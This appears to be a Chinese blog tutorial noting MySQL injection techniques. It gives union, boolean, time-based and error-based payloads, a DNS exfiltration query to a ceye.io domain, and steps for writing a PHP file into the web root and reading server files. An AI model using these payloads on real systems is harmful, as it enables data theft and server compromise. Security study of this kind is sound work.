查询语句

一、基本用法

1、CONCAT(str1,str2,str3)连接字符串为一个新字符串

SELECT CONCAT('a','b','c');

2、LENGTH(str)返回字符串str中字符的个数

SELECT LENGTH('abc');

3、LEFT(str,n)从字符串左边截取n个字符

SELECT LEFT('abc',1);

4、right(str,n)从字符串右边截取n个字符

SELECT right('abc',1);

5、substr(str,m,n)从字符串中截取从m开始,向后截取n个字符。下标从1开始

substring和mid与substr一样

SELECT substr('abc',2,1);

二、联合查询

1、查数据库

SELECT * FROM admin where id=1 UNION select (select GROUP_CONCAT(schema_name) from information_schema.schemata),2,3;

2、查表

SELECT * FROM admin where id=1 UNION select ( select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),2,3;

3、查列

SELECT * FROM admin where id=1 UNION select (select GROUP_CONCAT(column_name) from information_schema.columns where table_name='admin'),2,3;

4、查内容

SELECT * FROM admin where id=1 UNION select (select CONCAT(name,0x5c,age) from admin LIMIT 0,1),2,3;

5、不用()查询

SELECT * FROM admin where id=1 UNION select column_name,2,3 FROM information_schema.columns where table_name='admin';

三、布尔注入

select schema_name from information_schema.schemata;


SELECT * FROM admin where id=1 and mid((select schema_name from information_schema.schemata LIMIT 0,1),1,1)='i';


四、延时注入

SELECT * FROM admin where id=1 OR (if(mid((select schema_name from information_schema.schemata LIMIT 0,1),1,1)='i',SLEEP(5),1));

五、报错注入

1、FLOOR

SELECT * FROM admin where id=1
and
(SELECT 1 FROM (select COUNT(*),CONCAT((select GROUP_CONCAT(schema_name) from information_schema.schemata),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)

2、extractvalue

SELECT * FROM admin where id=1
and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

3、updatexml

SELECT * FROM admin where id=1
and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

六、DNS注入

1、UNC是windows下的一个通用命令规则(描述网络资源,如打印机等)

2、当这个点存在盲注时可以用DNS注入(前提是secure_file_priv不为NULL)

SHOW VARIABLES LIKE '%secure_file_priv%';

3、在http://ceye.io/profile平台找到你的域名xxx.ceye.io

3、执行语句

select * from admin where id = 4 and if((select load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\abc'))),1,0);

七、注入流程

1、先确定当前用户

select current_user();

2、确定当前用户权限(读写权限)

select File_priv from mysql.user where user='root' and host='localhost';

3、查看当前是否能导出

//NULL说明不允许,空表示可以,如果是个路径,表示只能导出到这个路径
show variables like "secure_file_priv";


//盲注查询
SELECT 1 AND if(substr((select @@global.secure_file_priv),1,1)='N',sleep(5),2);

//联合
SELECT 1 union SELECT @@global.secure_file_priv;

//报错
SELECT 1 and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e))

4、导出文件

select "<?php phpinfo();?>" into outfile 'C:/phpstudy_pro/WWW/phpinfo.php';

5、读文件

select load_file("C:/phpstudy_pro/WWW/phpinfo.php");

posted @ 2021-02-24 16:26  lnterpreter  阅读(188)  评论(0)    收藏  举报